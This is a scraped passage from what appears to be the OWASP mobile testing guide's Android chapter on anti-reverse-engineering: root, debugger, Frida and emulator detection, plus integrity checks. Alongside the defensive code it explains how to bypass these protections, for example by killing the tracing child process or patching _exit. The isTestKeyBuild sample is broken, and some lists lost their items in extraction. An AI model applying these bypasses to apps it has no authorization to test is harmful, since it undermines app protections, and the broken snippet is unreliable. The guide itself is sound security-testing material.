{ \n\u00a0 \u00a0\"requestDetails\": { \n\u00a0 \u00a0 \u00a0\"requestPackageName\": \"com.example.your.package\", \n\u00a0 \u00a0 \u00a0\"timestampMillis\": \"1666025823025\", \n\u00a0 \u00a0 \u00a0\"nonce\": \"kx7QEkGebwQfBalJ4...Xwjhak7o3uHDDQTTqI\" \n\u00a0 \u00a0}, \n\u00a0 \u00a0\"appIntegrity\": { \n\u00a0 \u00a0 \u00a0\"appRecognitionVerdict\": \"UNRECOGNIZED_VERSION\", \n\u00a0 \u00a0 \u00a0\"packageName\": \"com.example.your.package\", \n\u00a0 \u00a0 \u00a0\"certificateSha256Digest\": [ \n\u00a0 \u00a0 \u00a0 \u00a0\"vNsB0...ww1U\" \n\u00a0 \u00a0 \u00a0], \n\u00a0 \u00a0 \u00a0\"versionCode\": \"1\" \n\u00a0 \u00a0}, \n\u00a0 \u00a0\"deviceIntegrity\": { \n\u00a0 \u00a0 \u00a0\"deviceRecognitionVerdict\": [ \n\u00a0 \u00a0 \u00a0 \u00a0\"MEETS_DEVICE_INTEGRITY\" \n\u00a0 \u00a0 \u00a0] \n\u00a0 \u00a0}, \n\u00a0 \u00a0\"accountDetails\": { \n\u00a0 \u00a0 \u00a0\"appLicensingVerdict\": \"UNEVALUATED\" \n\u00a0 \u00a0} \n\u00a0} \n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#programmatic-detection","title":"Programmatic Detection","text":""},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#file-existence-checks","title":"File existence checks","text":"Perhaps the most widely used method of programmatic detection is checking for files typically found on rooted devices, such as package files of common rooting apps and their associated files and directories, including the following:
/system/app/Superuser.apk\n/system/etc/init.d/99SuperSUDaemon\n/dev/com.koushikdutta.superuser.daemon/\n/system/xbin/daemonsu\n
Detection code also often looks for binaries that are usually installed once a device has been rooted. These searches include checking for busybox and attempting to open the su binary at different locations:
/sbin/su\n/system/bin/su\n/system/bin/failsafe/su\n/system/xbin/su\n/system/xbin/busybox\n/system/sd/xbin/su\n/data/local/su\n/data/local/xbin/su\n/data/local/bin/su\n
Checking whether su
is on the PATH also works:
public static boolean checkRoot(){\n for(String pathDir : System.getenv(\"PATH\").split(\":\")){\n if(new File(pathDir, \"su\").exists()) {\n return true;\n }\n }\n return false;\n }\n
File checks can be easily implemented in both Java and native code. The following JNI example (adapted from rootinspector) uses the stat
system call to retrieve information about a file and returns \"1\" if the file exists.
jboolean Java_com_example_statfile(JNIEnv * env, jobject this, jstring filepath) {\n jboolean fileExists = 0;\n jboolean isCopy;\n const char * path = (*env)->GetStringUTFChars(env, filepath, &isCopy);\n struct stat fileattrib;\n if (stat(path, &fileattrib) < 0) {\n __android_log_print(ANDROID_LOG_DEBUG, DEBUG_TAG, \"NATIVE: stat error: [%s]\", strerror(errno));\n } else\n {\n __android_log_print(ANDROID_LOG_DEBUG, DEBUG_TAG, \"NATIVE: stat success, access perms: [%d]\", fileattrib.st_mode);\n return 1;\n }\n\n return 0;\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#executing-su-and-other-commands","title":"Executing su
and other commands","text":"Another way of determining whether su
exists is attempting to execute it through the Runtime.getRuntime.exec
method. An IOException will be thrown if su
is not on the PATH. The same method can be used to check for other programs often found on rooted devices, such as busybox and the symbolic links that typically point to it.
Supersu-by far the most popular rooting tool-runs an authentication daemon named daemonsu
, so the presence of this process is another sign of a rooted device. Running processes can be enumerated with the ActivityManager.getRunningAppProcesses
and manager.getRunningServices
APIs, the ps
command, and browsing through the /proc
directory. The following is an example implemented in rootinspector:
public boolean checkRunningProcesses() {\n\n boolean returnValue = false;\n\n // Get currently running application processes\n List<RunningServiceInfo> list = manager.getRunningServices(300);\n\n if(list != null){\n String tempName;\n for(int i=0;i<list.size();++i){\n tempName = list.get(i).process;\n\n if(tempName.contains(\"supersu\") || tempName.contains(\"superuser\")){\n returnValue = true;\n }\n }\n }\n return returnValue;\n }\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#checking-installed-app-packages","title":"Checking installed app packages","text":"You can use the Android package manager to obtain a list of installed packages. The following package names belong to popular rooting tools:
com.thirdparty.superuser\neu.chainfire.supersu\ncom.noshufou.android.su\ncom.koushikdutta.superuser\ncom.zachspong.temprootremovejb\ncom.ramdroid.appquarantine\ncom.topjohnwu.magisk\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#checking-for-writable-partitions-and-system-directories","title":"Checking for writable partitions and system directories","text":"Unusual permissions on system directories may indicate a customized or rooted device. Although the system and data directories are normally mounted read-only, you'll sometimes find them mounted read-write when the device is rooted. Look for these filesystems mounted with the \"rw\" flag or try to create a file in the data directories.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#checking-for-custom-android-builds","title":"Checking for custom Android builds","text":"Checking for signs of test builds and custom ROMs is also helpful. One way to do this is to check the BUILD tag for test-keys, which normally indicate a custom Android image. Check the BUILD tag as follows:
private boolean isTestKeyBuild()\n{\nString str = Build.TAGS;\nif ((str != null) && (str.contains(\"test-keys\")));\nfor (int i = 1; ; i = 0)\n return i;\n}\n
Missing Google Over-The-Air (OTA) certificates is another sign of a custom ROM: on stock Android builds, OTA updates Google's public certificates.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#anti-debugging","title":"Anti-Debugging","text":"Debugging is a highly effective way to analyze runtime app behavior. It allows the reverse engineer to step through the code, stop app execution at arbitrary points, inspect the state of variables, read and modify memory, and a lot more.
Anti-debugging features can be preventive or reactive. As the name implies, preventive anti-debugging prevents the debugger from attaching in the first place; reactive anti-debugging involves detecting debuggers and reacting to them in some way (e.g., terminating the app or triggering hidden behavior). The \"more-is-better\" rule applies: to maximize effectiveness, defenders combine multiple methods of prevention and detection that operate on different API layers and are well distributed throughout the app.
As mentioned in the \"Reverse Engineering and Tampering\" chapter, we have to deal with two debugging protocols on Android: we can debug on the Java level with JDWP or on the native layer via a ptrace-based debugger. A good anti-debugging scheme should defend against both types of debugging.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#jdwp-anti-debugging","title":"JDWP Anti-Debugging","text":"In the chapter \"Reverse Engineering and Tampering\", we talked about JDWP, the protocol used for communication between the debugger and the Java Virtual Machine. We showed that it is easy to enable debugging for any app by patching its manifest file, and changing the ro.debuggable
system property which enables debugging for all apps. Let's look at a few things developers do to detect and disable JDWP debuggers.
We have already encountered the android:debuggable
attribute. This flag in the Android Manifest determines whether the JDWP thread is started for the app. Its value can be determined programmatically, via the app's ApplicationInfo
object. If the flag is set, the manifest has been tampered with and allows debugging.
public static boolean isDebuggable(Context context){\n\n return ((context.getApplicationContext().getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE) != 0);\n\n }\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#isdebuggerconnected","title":"isDebuggerConnected","text":"While this might be pretty obvious to circumvent for a reverse engineer, you can use isDebuggerConnected
from the android.os.Debug
class to determine whether a debugger is connected.
public static boolean detectDebugger() {\n return Debug.isDebuggerConnected();\n }\n
The same API can be called via native code by accessing the DvmGlobals global structure.
JNIEXPORT jboolean JNICALL Java_com_test_debugging_DebuggerConnectedJNI(JNIenv * env, jobject obj) {\n if (gDvm.debuggerConnected || gDvm.debuggerActive)\n return JNI_TRUE;\n return JNI_FALSE;\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#timer-checks","title":"Timer Checks","text":"Debug.threadCpuTimeNanos
indicates the amount of time that the current thread has been executing code. Because debugging slows down process execution, you can use the difference in execution time to guess whether a debugger is attached.
static boolean detect_threadCpuTimeNanos(){\n long start = Debug.threadCpuTimeNanos();\n\n for(int i=0; i<1000000; ++i)\n continue;\n\n long stop = Debug.threadCpuTimeNanos();\n\n if(stop - start < 10000000) {\n return false;\n }\n else {\n return true;\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#messing-with-jdwp-related-data-structures","title":"Messing with JDWP-Related Data Structures","text":"In Dalvik, the global virtual machine state is accessible via the DvmGlobals
structure. The global variable gDvm holds a pointer to this structure. DvmGlobals
contains various variables and pointers that are important for JDWP debugging and can be tampered with.
struct DvmGlobals {\n /*\n * Some options that could be worth tampering with :)\n */\n\n bool jdwpAllowed; // debugging allowed for this process?\n bool jdwpConfigured; // has debugging info been provided?\n JdwpTransportType jdwpTransport;\n bool jdwpServer;\n char* jdwpHost;\n int jdwpPort;\n bool jdwpSuspend;\n\n Thread* threadList;\n\n bool nativeDebuggerActive;\n bool debuggerConnected; /* debugger or DDMS is connected */\n bool debuggerActive; /* debugger is making requests */\n JdwpState* jdwpState;\n\n};\n
For example, setting the gDvm.methDalvikDdmcServer_dispatch function pointer to NULL crashes the JDWP thread:
JNIEXPORT jboolean JNICALL Java_poc_c_crashOnInit ( JNIEnv* env , jobject ) {\n gDvm.methDalvikDdmcServer_dispatch = NULL;\n}\n
You can disable debugging by using similar techniques in ART even though the gDvm variable is not available. The ART runtime exports some of the vtables of JDWP-related classes as global symbols (in C++, vtables are tables that hold pointers to class methods). This includes the vtables of the classes JdwpSocketState
and JdwpAdbState
, which handle JDWP connections via network sockets and ADB, respectively. You can manipulate the behavior of the debugging runtime by overwriting the method pointers in the associated vtables (archived).
One way to overwrite the method pointers is to overwrite the address of the function jdwpAdbState::ProcessIncoming
with the address of JdwpAdbState::Shutdown
. This will cause the debugger to disconnect immediately.
#include <jni.h>\n#include <string>\n#include <android/log.h>\n#include <dlfcn.h>\n#include <sys/mman.h>\n#include <jdwp/jdwp.h>\n\n#define log(FMT, ...) __android_log_print(ANDROID_LOG_VERBOSE, \"JDWPFun\", FMT, ##__VA_ARGS__)\n\n// Vtable structure. Just to make messing around with it more intuitive\n\nstruct VT_JdwpAdbState {\n unsigned long x;\n unsigned long y;\n void * JdwpSocketState_destructor;\n void * _JdwpSocketState_destructor;\n void * Accept;\n void * showmanyc;\n void * ShutDown;\n void * ProcessIncoming;\n};\n\nextern \"C\"\n\nJNIEXPORT void JNICALL Java_sg_vantagepoint_jdwptest_MainActivity_JDWPfun(\n JNIEnv *env,\n jobject /* this */) {\n\n void* lib = dlopen(\"libart.so\", RTLD_NOW);\n\n if (lib == NULL) {\n log(\"Error loading libart.so\");\n dlerror();\n }else{\n\n struct VT_JdwpAdbState *vtable = ( struct VT_JdwpAdbState *)dlsym(lib, \"_ZTVN3art4JDWP12JdwpAdbStateE\");\n\n if (vtable == 0) {\n log(\"Couldn't resolve symbol '_ZTVN3art4JDWP12JdwpAdbStateE'.\\n\");\n }else {\n\n log(\"Vtable for JdwpAdbState at: %08x\\n\", vtable);\n\n // Let the fun begin!\n\n unsigned long pagesize = sysconf(_SC_PAGE_SIZE);\n unsigned long page = (unsigned long)vtable & ~(pagesize-1);\n\n mprotect((void *)page, pagesize, PROT_READ | PROT_WRITE);\n\n vtable->ProcessIncoming = vtable->ShutDown;\n\n // Reset permissions & flush cache\n\n mprotect((void *)page, pagesize, PROT_READ);\n\n }\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#traditional-anti-debugging","title":"Traditional Anti-Debugging","text":"On Linux, the ptrace
system call is used to observe and control the execution of a process (the tracee) and to examine and change that process' memory and registers. ptrace
is the primary way to implement system call tracing and breakpoint debugging in native code. Most JDWP anti-debugging tricks (which may be safe for timer-based checks) won't catch classical debuggers based on ptrace
and therefore, many Android anti-debugging tricks include ptrace
, often exploiting the fact that only one debugger at a time can attach to a process.
When you debug an app and set a breakpoint on native code, Android Studio will copy the needed files to the target device and start the lldb-server which will use ptrace
to attach to the process. From this moment on, if you inspect the status file of the debugged process (/proc/<pid>/status
or /proc/self/status
), you will see that the \"TracerPid\" field has a value different from 0, which is a sign of debugging.
Remember that this only applies to native code. If you're debugging a Java/Kotlin-only app the value of the \"TracerPid\" field should be 0.
This technique is usually applied within the JNI native libraries in C, as shown in Google's gperftools (Google Performance Tools)) Heap Checker implementation of the IsDebuggerAttached
method. However, if you prefer to include this check as part of your Java/Kotlin code you can refer to this Java implementation of the hasTracerPid
method from Tim Strazzere's Anti-Emulator project.
When trying to implement such a method yourself, you can manually check the value of TracerPid with ADB. The following listing uses Google's NDK sample app hello-jni (com.example.hellojni) to perform the check after attaching Android Studio's debugger:
$ adb shell ps -A | grep com.example.hellojni\nu0_a271 11657 573 4302108 50600 ptrace_stop 0 t com.example.hellojni\n$ adb shell cat /proc/11657/status | grep -e \"^TracerPid:\" | sed \"s/^TracerPid:\\t//\"\nTracerPid: 11839\n$ adb shell ps -A | grep 11839\nu0_a271 11839 11837 14024 4548 poll_schedule_timeout 0 S lldb-server\n
You can see how the status file of com.example.hellojni (PID=11657) contains a TracerPID of 11839, which we can identify as the lldb-server process.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#using-fork-and-ptrace","title":"Using Fork and ptrace","text":"You can prevent debugging of a process by forking a child process and attaching it to the parent as a debugger via code similar to the following simple example code:
void fork_and_attach()\n{\n int pid = fork();\n\n if (pid == 0)\n {\n int ppid = getppid();\n\n if (ptrace(PTRACE_ATTACH, ppid, NULL, NULL) == 0)\n {\n waitpid(ppid, NULL, 0);\n\n /* Continue the parent process */\n ptrace(PTRACE_CONT, NULL, NULL);\n }\n }\n}\n
With the child attached, further attempts to attach to the parent will fail. We can verify this by compiling the code into a JNI function and packing it into an app we run on the device.
root@android:/ # ps | grep -i anti\nu0_a151 18190 201 1535844 54908 ffffffff b6e0f124 S sg.vantagepoint.antidebug\nu0_a151 18224 18190 1495180 35824 c019a3ac b6e0ee5c S sg.vantagepoint.antidebug\n
Attempting to attach to the parent process with gdbserver fails with an error:
root@android:/ # ./gdbserver --attach localhost:12345 18190\nwarning: process 18190 is already traced by process 18224\nCannot attach to lwp 18190: Operation not permitted (1)\nExiting\n
You can easily bypass this failure, however, by killing the child and \"freeing\" the parent from being traced. You'll therefore usually find more elaborate schemes, involving multiple processes and threads as well as some form of monitoring to impede tampering. Common methods include
/proc
filesystem, such as TracerPID in /proc/pid/status
.Let's look at a simple improvement for the method above. After the initial fork
, we launch in the parent an extra thread that continually monitors the child's status. Depending on whether the app has been built in debug or release mode (which is indicated by the android:debuggable
flag in the manifest), the child process should do one of the following things:
waitpid(child_pid)
should never return. If it does, something is fishy and we would kill the whole process group.The following is the complete code for implementing this improvement with a JNI function:
#include <jni.h>\n#include <unistd.h>\n#include <sys/ptrace.h>\n#include <sys/wait.h>\n#include <pthread.h>\n\nstatic int child_pid;\n\nvoid *monitor_pid() {\n\n int status;\n\n waitpid(child_pid, &status, 0);\n\n /* Child status should never change. */\n\n _exit(0); // Commit seppuku\n\n}\n\nvoid anti_debug() {\n\n child_pid = fork();\n\n if (child_pid == 0)\n {\n int ppid = getppid();\n int status;\n\n if (ptrace(PTRACE_ATTACH, ppid, NULL, NULL) == 0)\n {\n waitpid(ppid, &status, 0);\n\n ptrace(PTRACE_CONT, ppid, NULL, NULL);\n\n while (waitpid(ppid, &status, 0)) {\n\n if (WIFSTOPPED(status)) {\n ptrace(PTRACE_CONT, ppid, NULL, NULL);\n } else {\n // Process has exited\n _exit(0);\n }\n }\n }\n\n } else {\n pthread_t t;\n\n /* Start the monitoring thread */\n pthread_create(&t, NULL, monitor_pid, (void *)NULL);\n }\n}\n\nJNIEXPORT void JNICALL\nJava_sg_vantagepoint_antidebug_MainActivity_antidebug(JNIEnv *env, jobject instance) {\n\n anti_debug();\n}\n
Again, we pack this into an Android app to see if it works. Just as before, two processes show up when we run the app's debug build.
root@android:/ # ps | grep -I anti-debug\nu0_a152 20267 201 1552508 56796 ffffffff b6e0f124 S sg.vantagepoint.anti-debug\nu0_a152 20301 20267 1495192 33980 c019a3ac b6e0ee5c S sg.vantagepoint.anti-debug\n
However, if we terminate the child process at this point, the parent exits as well:
root@android:/ # kill -9 20301\n130|root@hammerhead:/ # cd /data/local/tmp\nroot@android:/ # ./gdbserver --attach localhost:12345 20267\ngdbserver: unable to open /proc file '/proc/20267/status'\nCannot attach to lwp 20267: No such file or directory (2)\nExiting\n
To bypass this, we must modify the app's behavior slightly (the easiest ways to do so are patching the call to _exit
with NOPs and hooking the function _exit
in libc.so
). At this point, we have entered the proverbial \"arms race\": implementing more intricate forms of this defense as well as bypassing it are always possible.
There are two topics related to file integrity:
SharedPreferences
should be protected.Integrity checks often calculate a checksum or hash over selected files. Commonly protected files include
The following sample implementation from the Android Cracking blog calculates a CRC over classes.dex
and compares it to the expected value.
private void crcTest() throws IOException {\n boolean modified = false;\n // required dex crc value stored as a text string.\n // it could be any invisible layout element\n long dexCrc = Long.parseLong(Main.MyContext.getString(R.string.dex_crc));\n\n ZipFile zf = new ZipFile(Main.MyContext.getPackageCodePath());\n ZipEntry ze = zf.getEntry(\"classes.dex\");\n\n if ( ze.getCrc() != dexCrc ) {\n // dex has been modified\n modified = true;\n }\n else {\n // dex not tampered with\n modified = false;\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#sample-implementation-storage","title":"Sample Implementation - Storage","text":"When providing integrity on the storage itself, you can either create an HMAC over a given key-value pair (as for the Android SharedPreferences
) or create an HMAC over a complete file that's provided by the file system.
When using an HMAC, you can use a bouncy castle implementation or the AndroidKeyStore to HMAC the given content.
Complete the following procedure when generating an HMAC with BouncyCastle:
doFinal
on the HMAC with the bytecode.Complete the following procedure when verifying the HMAC with BouncyCastle:
When generating the HMAC based on the Android Keystore, then it is best to only do this for Android 6.0 (API level 23) and higher.
The following is a convenient HMAC implementation without AndroidKeyStore
:
public enum HMACWrapper {\n HMAC_512(\"HMac-SHA512\"), //please note that this is the spec for the BC provider\n HMAC_256(\"HMac-SHA256\");\n\n private final String algorithm;\n\n private HMACWrapper(final String algorithm) {\n this.algorithm = algorithm;\n }\n\n public Mac createHMAC(final SecretKey key) {\n try {\n Mac e = Mac.getInstance(this.algorithm, \"BC\");\n SecretKeySpec secret = new SecretKeySpec(key.getKey().getEncoded(), this.algorithm);\n e.init(secret);\n return e;\n } catch (NoSuchProviderException | InvalidKeyException | NoSuchAlgorithmException e) {\n //handle them\n }\n }\n\n public byte[] hmac(byte[] message, SecretKey key) {\n Mac mac = this.createHMAC(key);\n return mac.doFinal(message);\n }\n\n public boolean verify(byte[] messageWithHMAC, SecretKey key) {\n Mac mac = this.createHMAC(key);\n byte[] checksum = extractChecksum(messageWithHMAC, mac.getMacLength());\n byte[] message = extractMessage(messageWithHMAC, mac.getMacLength());\n byte[] calculatedChecksum = this.hmac(message, key);\n int diff = checksum.length ^ calculatedChecksum.length;\n\n for (int i = 0; i < checksum.length && i < calculatedChecksum.length; ++i) {\n diff |= checksum[i] ^ calculatedChecksum[i];\n }\n\n return diff == 0;\n }\n\n public byte[] extractMessage(byte[] messageWithHMAC) {\n Mac hmac = this.createHMAC(SecretKey.newKey());\n return extractMessage(messageWithHMAC, hmac.getMacLength());\n }\n\n private static byte[] extractMessage(byte[] body, int checksumLength) {\n if (body.length >= checksumLength) {\n byte[] message = new byte[body.length - checksumLength];\n System.arraycopy(body, 0, message, 0, message.length);\n return message;\n } else {\n return new byte[0];\n }\n }\n\n private static byte[] extractChecksum(byte[] body, int checksumLength) {\n if (body.length >= checksumLength) {\n byte[] checksum = new byte[checksumLength];\n System.arraycopy(body, body.length - checksumLength, checksum, 0, checksumLength);\n return checksum;\n } else {\n return new byte[0];\n }\n }\n\n static {\n Security.addProvider(new BouncyCastleProvider());\n }\n}\n
Another way to provide integrity is to sign the byte array you obtained and add the signature to the original byte array.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#detection-of-reverse-engineering-tools","title":"Detection of Reverse Engineering Tools","text":"The presence of tools, frameworks and apps commonly used by reverse engineers may indicate an attempt to reverse engineer the app. Some of these tools can only run on a rooted device, while others force the app into debugging mode or depend on starting a background service on the mobile phone. Therefore, there are different ways that an app may implement to detect a reverse engineering attack and react to it, e.g. by terminating itself.
You can detect popular reverse engineering tools that have been installed in an unmodified form by looking for associated application packages, files, processes, or other tool-specific modifications and artifacts. In the following examples, we'll discuss different ways to detect the Frida instrumentation framework, which is used extensively in this guide. Other tools, such as Substrate and Xposed, can be detected similarly. Note that DBI/injection/hooking tools can often be detected implicitly, through runtime integrity checks, which are discussed below.
For instance, in its default configuration on a rooted device, Frida runs on the device as frida-server. When you explicitly attach to a target app (e.g. via frida-trace or the Frida REPL), Frida injects a frida-agent into the memory of the app. Therefore, you may expect to find it there after attaching to the app (and not before). If you check /proc/<pid>/maps
you'll find the frida-agent as frida-agent-64.so:
bullhead:/ # cat /proc/18370/maps | grep -i frida\n71b6bd6000-71b7d62000 r-xp /data/local/tmp/re.frida.server/frida-agent-64.so\n71b7d7f000-71b7e06000 r--p /data/local/tmp/re.frida.server/frida-agent-64.so\n71b7e06000-71b7e28000 rw-p /data/local/tmp/re.frida.server/frida-agent-64.so\n
The other method (which also works for non-rooted devices) consists of embedding a frida-gadget into the APK and forcing the app to load it as one of its native libraries. If you inspect the app memory maps after starting the app (no need to attach explicitly to it) you'll find the embedded frida-gadget as libfrida-gadget.so.
bullhead:/ # cat /proc/18370/maps | grep -i frida\n\n71b865a000-71b97f1000 r-xp /data/app/sg.vp.owasp_mobile.omtg_android-.../lib/arm64/libfrida-gadget.so\n71b9802000-71b988a000 r--p /data/app/sg.vp.owasp_mobile.omtg_android-.../lib/arm64/libfrida-gadget.so\n71b988a000-71b98ac000 rw-p /data/app/sg.vp.owasp_mobile.omtg_android-.../lib/arm64/libfrida-gadget.so\n
Looking at these two traces that Frida lefts behind, you might already imagine that detecting those would be a trivial task. And actually, so trivial will be bypassing that detection. But things can get much more complicated. The following table shortly presents a set of some typical Frida detection methods and a short discussion on their effectiveness.
Some of the following detection methods are presented in the article \"The Jiu-Jitsu of Detecting Frida\" by Berdhard Mueller (archived). Please refer to it for more details and for example code snippets.
Method Description Discussion Checking the App Signature In order to embed the frida-gadget within the APK, it would need to be repackaged and resigned. You could check the signature of the APK when the app is starting (e.g. GET_SIGNING_CERTIFICATES since API level 28) and compare it to the one you pinned in your APK. This is unfortunately too trivial to bypass, e.g. by patching the APK or performing system call hooking. Check The Environment For Related Artifacts Artifacts can be package files, binaries, libraries, processes, and temporary files. For Frida, this could be the frida-server running in the target (rooted) system (the daemon responsible for exposing Frida over TCP). Inspect the running services (getRunningServices
) and processes (ps
) searching for one whose name is \"frida-server\". You could also walk through the list of loaded libraries and check for suspicious ones (e.g. those including \"frida\" in their names). Since Android 7.0 (API level 24), inspecting the running services/processes won't show you daemons like the frida-server as it is not being started by the app itself. Even if it would be possible, bypassing this would be as easy just renaming the corresponding Frida artifact (frida-server/frida-gadget/frida-agent). Checking For Open TCP Ports The frida-server process binds to TCP port 27042 by default. Check whether this port is open is another method of detecting the daemon. This method detects frida-server in its default mode, but the listening port can be changed via a command line argument, so bypassing this is a little too trivial. Checking For Ports Responding To D-Bus Auth frida-server
uses the D-Bus protocol to communicate, so you can expect it to respond to D-Bus AUTH. Send a D-Bus AUTH message to every open port and check for an answer, hoping that frida-server
will reveal itself. This is a fairly robust method of detecting frida-server
, but Frida offers alternative modes of operation that don't require frida-server. Scanning Process Memory for Known Artifacts Scan the memory for artifacts found in Frida's libraries, e.g. the string \"LIBFRIDA\" present in all versions of frida-gadget and frida-agent. For example, use Runtime.getRuntime().exec
and iterate through the memory mappings listed in /proc/self/maps
or /proc/<pid>/maps
(depending on the Android version) searching for the string. This method is a bit more effective, and it is difficult to bypass with Frida only, especially if some obfuscation has been added and if multiple artifacts are being scanned. However, the chosen artifacts might be patched in the Frida binaries. Find the source code on Berdhard Mueller's GitHub. Please remember that this table is far from exhaustive. We could start talking about named pipes (used by frida-server for external communication), detecting trampolines (indirect jump vectors inserted at the prologue of functions), which would help detecting Substrate or Frida's Interceptor but, for example, won't be effective against Frida's Stalker; and many other, more or less, effective detection methods. Each of them will depend on whether you're using a rooted device, the specific version of the rooting method and/or the version of the tool itself. Further, the app can try to make it harder to detect the implemented protection mechanisms by using various obfuscation techniques. At the end, this is part of the cat and mouse game of protecting data being processed on an untrusted environment (an app running in the user device).
It is important to note that these controls are only increasing the complexity of the reverse engineering process. If used, the best approach is to combine the controls cleverly instead of using them individually. However, none of them can assure a 100% effectiveness, as the reverse engineer will always have full access to the device and will therefore always win! You also have to consider that integrating some of the controls into your app might increase the complexity of your app and even have an impact on its performance.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#emulator-detection","title":"Emulator Detection","text":"In the context of anti-reversing, the goal of emulator detection is to increase the difficulty of running the app on an emulated device, which impedes some tools and techniques reverse engineers like to use. This increased difficulty forces the reverse engineer to defeat the emulator checks or utilize the physical device, thereby barring the access required for large-scale device analysis.
There are several indicators that the device in question is being emulated. Although all these API calls can be hooked, these indicators provide a modest first line of defense.
The first set of indicators are in the file build.prop
.
API Method Value Meaning\nBuild.ABI armeabi possibly emulator\nBUILD.ABI2 unknown possibly emulator\nBuild.BOARD unknown emulator\nBuild.Brand generic emulator\nBuild.DEVICE generic emulator\nBuild.FINGERPRINT generic emulator\nBuild.Hardware goldfish emulator\nBuild.Host android-test possibly emulator\nBuild.ID FRF91 emulator\nBuild.MANUFACTURER unknown emulator\nBuild.MODEL sdk emulator\nBuild.PRODUCT sdk emulator\nBuild.RADIO unknown possibly emulator\nBuild.SERIAL null emulator\nBuild.USER android-build emulator\n
You can edit the file build.prop
on a rooted Android device or modify it while compiling AOSP from source. Both techniques will allow you to bypass the static string checks above.
The next set of static indicators utilize the Telephony manager. All Android emulators have fixed values that this API can query.
API Value Meaning\nTelephonyManager.getDeviceId() 0's emulator\nTelephonyManager.getLine1 Number() 155552155 emulator\nTelephonyManager.getNetworkCountryIso() us possibly emulator\nTelephonyManager.getNetworkType() 3 possibly emulator\nTelephonyManager.getNetworkOperator().substring(0,3) 310 possibly emulator\nTelephonyManager.getNetworkOperator().substring(3) 260 possibly emulator\nTelephonyManager.getPhoneType() 1 possibly emulator\nTelephonyManager.getSimCountryIso() us possibly emulator\nTelephonyManager.getSimSerial Number() 89014103211118510720 emulator\nTelephonyManager.getSubscriberId() 310260000000000 emulator\nTelephonyManager.getVoiceMailNumber() 15552175049 emulator\n
Keep in mind that a hooking framework, such as Xposed or Frida, can hook this API to provide false data.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#runtime-integrity-verification","title":"Runtime Integrity Verification","text":"Controls in this category verify the integrity of the app's memory space to defend the app against memory patches applied during runtime. Such patches include unwanted changes to binary code, bytecode, function pointer tables, and important data structures, as well as rogue code loaded into process memory. Integrity can be verified by:
There's some overlap with the category \"detecting reverse engineering tools and frameworks\", and, in fact, we demonstrated the signature-based approach in that chapter when we showed how to search process memory for Frida-related strings. Below are a few more examples of various kinds of integrity monitoring.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#detecting-tampering-with-the-java-runtime","title":"Detecting Tampering with the Java Runtime","text":"This detection code is from the dead && end blog.
try {\n throw new Exception();\n}\ncatch(Exception e) {\n int zygoteInitCallCount = 0;\n for(StackTraceElement stackTraceElement : e.getStackTrace()) {\n if(stackTraceElement.getClassName().equals(\"com.android.internal.os.ZygoteInit\")) {\n zygoteInitCallCount++;\n if(zygoteInitCallCount == 2) {\n Log.wtf(\"HookDetection\", \"Substrate is active on the device.\");\n }\n }\n if(stackTraceElement.getClassName().equals(\"com.saurik.substrate.MS$2\") &&\n stackTraceElement.getMethodName().equals(\"invoked\")) {\n Log.wtf(\"HookDetection\", \"A method on the stack trace has been hooked using Substrate.\");\n }\n if(stackTraceElement.getClassName().equals(\"de.robv.android.xposed.XposedBridge\") &&\n stackTraceElement.getMethodName().equals(\"main\")) {\n Log.wtf(\"HookDetection\", \"Xposed is active on the device.\");\n }\n if(stackTraceElement.getClassName().equals(\"de.robv.android.xposed.XposedBridge\") &&\n stackTraceElement.getMethodName().equals(\"handleHookedMethod\")) {\n Log.wtf(\"HookDetection\", \"A method on the stack trace has been hooked using Xposed.\");\n }\n\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#detecting-native-hooks","title":"Detecting Native Hooks","text":"By using ELF binaries, native function hooks can be installed by overwriting function pointers in memory (e.g., Global Offset Table or PLT hooking) or patching parts of the function code itself (inline hooking). Checking the integrity of the respective memory regions is one way to detect this kind of hook.
The Global Offset Table (GOT) is used to resolve library functions. During runtime, the dynamic linker patches this table with the absolute addresses of global symbols. GOT hooks overwrite the stored function addresses and redirect legitimate function calls to adversary-controlled code. This type of hook can be detected by enumerating the process memory map and verifying that each GOT entry points to a legitimately loaded library.
In contrast to GNU ld
, which resolves symbol addresses only after they are needed for the first time (lazy binding), the Android linker resolves all external functions and writes the respective GOT entries immediately after a library is loaded (immediate binding). You can therefore expect all GOT entries to point to valid memory locations in the code sections of their respective libraries during runtime. GOT hook detection methods usually walk the GOT and verify this.
Inline hooks work by overwriting a few instructions at the beginning or end of the function code. During runtime, this so-called trampoline redirects execution to the injected code. You can detect inline hooks by inspecting the prologues and epilogues of library functions for suspect instructions, such as far jumps to locations outside the library.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#obfuscation","title":"Obfuscation","text":"The chapter \"Mobile App Tampering and Reverse Engineering\" introduces several well-known obfuscation techniques that can be used in mobile apps in general.
